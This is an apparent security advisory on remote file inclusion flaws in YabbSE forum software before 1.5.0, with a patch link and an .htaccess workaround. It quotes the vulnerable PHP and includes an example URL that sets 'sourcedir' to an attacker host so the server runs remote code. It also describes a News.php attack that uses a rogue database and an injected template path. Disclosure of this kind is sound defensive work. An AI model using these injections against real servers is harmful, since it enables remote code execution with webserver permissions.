|
COMMAND YabbSE remote code execution SYSTEMS AFFECTED YabbSE versions prior to 1.5.0 PROBLEM Mindwarper [mindwarper@hush.com] says : YabbSE keeps all of it's function includes in a directory called "Sources" which is not protected. Inside this directory a file called Packages.php exists. This file is supposed to be included and not called directly, but if an attacker calls it directly he/she may cause the script to run remote arbitrary code. Bellow are a couple of the first lines in Packages.php: ******** .. global $adminplver; $Packagesphpver="YaBB SE 1.4.1"; $safe_mode = ini_get("safe_mode"); $pacmanver = "1.4.1"; include_once("$sourcedir/Packer.php"); .. ******** We can see here that the variable $sourcedir is never defined and therefore may be defined through global injection. Example: http://victim/yabbse/Sources/Packages.php?sourcedir=http://attacker/ where the attacker server has a file called Packer.php. An attacker may execute remote code on the server with webserver permissions. Side-note: An attacker may also use this file for XSS attack on the server. Update (25 January 2003) ====== Mindwarpe adds : YabbSE contains a file called News.php which is found in the root directory. For some unkown reason the vendor did not place this file inside /Sources even though this file is only intended to be used as an include. An attacker can combine his own server with the victim in such way that it would allow him/her to inlcude remote arbitrary code on the victim's server and run it with webserver permissions. The attack works as following: ******** .. $dbcon = mysql_connect($db_server,$db_user,$db_passwd); mysql_select_db ($db_name); .. ******** First of all we can see News.php is trying to connect to the sql database. We can see that the variables above that contain the database information are not defined and may be changed by the attacker. If the attacker installs yabbse on his/her server and allows remote sql connection, then News.php will think the database has been loaded successfully and run the following lines: ******** .. if ($template == null) include("news_template.php"); else { if ($ext == null) include($template.".php"); else include($template.".".$ext); } .. ******** Since template is never defined before, the attacker may inject into $template his/her own remote file. News.php will include the attacker's code and run it on the server and give the attacker the ability to execute arbitrary code on the server with webserver permissions. SOLUTION Get patch from http://www.yabbse.org Workaround ========== As a temporary solution, create a .htaccess file that contains 'Deny from all'. Place it in the /Sources/ directory and that should block remote users from accessing it.